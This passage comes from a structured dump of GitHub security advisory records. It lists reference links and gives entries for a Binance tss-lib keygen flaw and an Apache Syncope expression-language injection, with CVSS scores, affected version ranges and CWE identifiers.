'url': 'https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e@%3Cusers.pdfbox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf937c2236e6c79cdb99f76a70690dd345e53dbe0707cb506a202e43e@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/06/12/2'}]
{'cwe_ids': ['CWE-770', 'CWE-789'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:39:19Z', 'nvd_published_at': '2021-06-12T10:15:00Z'}
1.4.0
GHSA-399h-cmvp-qgx5
2021-05-25T20:16:35Z
2021-06-29T21:32:11Z
null
['CVE-2020-12118']
Incorrect Default Permissions in Binance tss-lib
The keygen protocol implementation in Binance tss-lib before 1.2.0 allows attackers to generate crafted h1 and h2 parameters in order to compromise a signing round or obtain sensitive information from other parties.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N/E:U/RL:O/RC:R'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/binance-chain/tss-lib/ecdsa/keygen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12118'}, {'type': 'WEB', 'url': 'https://github.com/binance-chain/tss-lib/pull/89'}, {'type': 'WEB', 'url': 'https://github.com/binance-chain/tss-lib/pull/89/commits/7b7c17e90504d5dad94b938e84fec690bb1ec311'}, {'type': 'WEB', 'url': 'https://github.com/binance-chain/tss-lib/releases/tag/v1.2.0'}]
{'cwe_ids': ['CWE-276'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:16:35Z', 'nvd_published_at': None}
1.4.0
GHSA-vjqw-r3ww-wj2w
2021-07-29T16:57:05Z
2021-06-16T17:18:58Z
null
['CVE-2020-1959']
Expression Language Injection in Apache Syncope
A Server-Side Template Injection was identified in Apache Syncope prior to 2.1.6 enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template being passed, they will be able to run arbitrary Java code.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.syncope:syncope-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1959'}, {'type': 'WEB', 'url': 'http://syncope.apache.org/security'}]
{'cwe_ids': ['CWE-917'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:59:03Z', 'nvd_published_at': '2020-05-04T13:15:00Z'}